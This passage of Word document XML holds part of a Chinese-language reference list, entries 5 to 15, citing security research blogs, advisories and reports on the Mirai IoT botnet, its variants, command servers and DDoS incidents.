                      <w:t>僵尸网络的新变种和旧主控</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 29 11 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/a-mirai-botnet-evolvement-new-variant-and-old-c2/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Mirai </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>变种中的</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>DGA,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 9 12 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Bambenek, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai Scanning for Port 6789 Looking for New Victims / Now hitting tcp/23231,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Wikipedia, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai (malware),</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 12 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://en.wikipedia.org/wiki/Mirai_(malware).</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai Scanner,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://data.netlab.360.com/mirai-scanner.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“关于</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> mirai </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>僵尸网络控制主机的数据分析</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 27 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>绿盟科技</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“德国</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>1127</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>断网事件技术分析与防护方案</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 25 12 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.nsfocus.net/germany-1127-network-events/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>李东宏</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>源码分析报告</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 13 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.nsfocus.net/mirai-source-analysis-report/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>匡恩网络</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“北美</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>DDoS</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>事件与</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>IOT</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>安防监控设备安全</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 24 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://www.kuangn.com/news/industry/detail/458.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>泰格实验室</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“蜜罐揭秘真实的</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>僵尸网络</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 9 1 2017. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://www.freebuf.com/articles/terminal/124717.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00B65ABC">
                <w:trPr>
                  <w:divId w:val="935603005"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00B65ABC" w:rsidRDefault="00B65ABC">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">lennarthaagsma, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
